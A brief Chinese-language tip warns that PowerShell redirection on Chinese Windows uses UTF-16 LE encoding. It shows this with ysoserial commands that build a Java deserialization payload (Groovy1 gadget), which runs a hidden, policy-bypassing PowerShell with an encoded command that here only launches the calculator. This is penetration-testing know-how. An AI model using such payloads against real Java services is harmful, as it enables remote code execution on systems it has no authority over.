powershell 中文系统默认UTF-16 (LE) UNICODE编码 使用时需小心

现象：

1.cmd生成payload

java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload.bin

2.powershell生成payload

java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload2.bin

第二次生成：

java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" | Out-File -Encoding default payload3.bin

3.结果对比

4.学习

https://wenku.baidu.com/view/768a052b915f804d2b16c149.html

https://docs.microsoft.com/zh-cn/powershell/module/Microsoft.PowerShell.Utility/Out-File?view=powershell-6